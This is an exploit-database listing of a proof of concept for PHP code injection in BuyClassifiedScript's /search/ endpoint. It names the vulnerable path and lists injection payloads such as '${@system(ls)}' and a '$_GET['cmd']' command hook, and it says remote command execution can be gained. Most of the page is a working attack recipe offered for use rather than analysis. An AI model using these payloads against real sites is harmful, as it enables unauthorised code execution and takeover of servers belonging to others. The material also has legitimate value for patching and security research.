[] NeoSense
E X P L O I T S
title author type platform port cve id

BuyClassifiedScript - PHP Code Injection

Author: d3b4g
type: webapps
platform: php
port: 
date_added: 2012-11-26 
date_updated: 2012-11-26 
verified: 1 
codes: OSVDB-87875 
tags: 
aliases:  
screenshot_url:  
application_url: 
# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me




----------------------------------------------------------------------------------

     This vulnerability  allows an attacker to inject custom code
     into the server side scripting engine.It's possible to get a remote cmd by taking
     advantage of this vulnerability.


     Vulnerable function:

     /search/


     () php code excution :


     http://localhost/path/search {Inject malicious code}


     () example of code you can inject:


     //  ${@system(ls)}

        ${@print(hello)}

        $_GET['cmd']


                         //



-end-
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.